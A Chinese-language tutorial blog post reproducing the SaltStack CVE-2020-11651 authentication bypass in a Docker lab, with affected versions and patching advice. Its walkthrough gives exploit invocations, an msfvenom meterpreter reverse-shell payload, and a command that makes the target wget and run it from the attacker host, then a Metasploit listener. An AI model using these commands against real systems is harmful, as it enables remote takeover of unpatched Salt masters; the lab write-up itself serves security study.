91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析

發布時間:2021-12-28 19:46:06 來源:億速云 閱讀:153 作者:柒染 欄目:安全技術

這期內容當中小編將會給大家帶來有關SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

1.簡介


SaltStack是基于Python開發的一套C/S架構配置管理工具,是一個服務器基礎架構集中化管理平臺,具備配置管理、遠程執行、監控等功能,基于Python語言實現,結合輕量級消息隊列(ZeroMQ)與Python第三方模塊(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)構建。

通過部署SaltStack,運維人員可以在成千萬臺服務器上做到批量執行命令,根據不同業務進行配置集中化管理、分發文件、采集服務器數據、操作系統基礎及軟件包管理等,SaltStack是運維人員提高工作效率、規范業務配置與操作的利器。


2.概述


CVE-2020-11651:認證繞過漏洞,攻擊者通過構造惡意請求,繞過Salt Master的驗證邏輯,調用相關未授權函數功能,達到遠程命令執行目的。


3.漏洞影響范圍


  • SaltStack < 2019.2.4

  • SaltStack < 3000.2


4.修復版本


  • 2019.2.4

  • 3000.2


5.漏洞復現


5.1 環境說明:


  • 靶機: 192.168.190.128(ubuntu18.04)(基于Docker搭建漏洞環境)

  • 攻擊機: 192.168.190.129(kali2020.4)

  • exp:https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP


5.2 拉取鏡像


docker pull vulfocus/saltstack-cve_2020_11651

拉取鏡像的過程可能有點慢,建議配置docker鏡像加速器;

因為我已經拉取過鏡像,所以直接下一步;


5.3 啟動鏡像


docker run -d -p 4506:4506 -p 4505:4505 vulfocus/saltstack-cve_2020_11651

查看docker是否開啟

docker ps

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析

環境啟動成功


5.4 漏洞利用


1.安裝 python salt模塊

pip3 install salt

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析

查看是否已成功安裝 salt

pip3 list

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


2.exp使用方法

python3 CVE-2020-11651.py

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


3.嘗試讀取文件

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


4.嘗試反彈shell

1.常規方式反彈shell失敗

嘗試很多方法,更換exp,更改反彈端口號,但是都沒有成功~

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


2.尋找失敗原因

找了很久終于找到一篇文章,無法反彈shell的原因可能是搭建的docker環境中不存在nc命令

測試靶機發現已安裝nc命令

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


忽然想到我的攻擊機kali是2020.4版本,使用的shell是zsh;而ubuntu使用的shell類型是bash猜測有可能是這個原因導致無法反彈

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析

嘗試修改kali的shell為bash,失敗告終~


3.上傳木馬

按照文章中的方法:

更換exp:https://github.com/dozernz/cve-2020-11651

然后嘗試在攻擊機生成一個木馬,名為test

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp  LHOST=192.168.190.129 LPORT=6666  -i 3 -f elf -o test

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


開啟攻擊機Apache:

/etc/init.d/apache2 start

查看apache是否開啟

service apache2 status

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


復制木馬到apache網站根目錄

cp test /var/www/html/test

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


利用exp執行命令進行遠程下載: (報錯是exp腳本問題)

python3 CVE-2020-11651.py 192.168.190.128 master 'wget http://192.168.190.129/test|./test'

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


添加執行權限

python3 CVE-2020-11651.py 192.168.190.128 master 'chmod +x test |./test'

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


4.開啟監聽

1.開始msf

msfconsole

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


2.加載模塊

use exploit/multi/handler

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


3.設置payload

set payload linux/x64/meterpreter/reverse_tcp

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


4.設置監聽IP&Port

set lhost 192.168.190.129

set lport 6666

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


5.執行

exploit

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


6.遠程執行靶機上的木馬

python3 CVE-2020-11651.py 192.168.190.128 master './test'

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


7.成功獲得會話

SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析


6.漏洞修復方案


  1. SaltStack官方已發布最新版本修復此漏洞,相關用戶及時更新至安全版本及其以上,升級前做好快照備份。

  2. 開啟SaltStack自動更新,實時獲取補丁或升級至安全版本。

  3. 禁止將Salt Master默認監聽端口(4505、4506)向公網開放,設置為僅對可信對象開放。

上述就是小編為大家分享的SaltStack認證繞過漏洞CVE-2020-11651復現的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

德兴市| 慈利县| 神池县| 富宁县| 丹寨县| 星子县| 辛集市| 谢通门县| 荣成市| 合阳县| 乡城县| 临城县| 陇西县| 偏关县| 江阴市| 枣庄市| 北碚区| 杂多县| 广西| 鄂温| 黄大仙区| 如皋市| 四子王旗| 龙南县| 辉县市| 宁化县| 静乐县| 公主岭市| 突泉县| 喀喇| 金山区| 克什克腾旗| 井研县| 永定县| 阜阳市| 榆林市| 陆丰市| 仪陇县| 临汾市| 廉江市| 莎车县|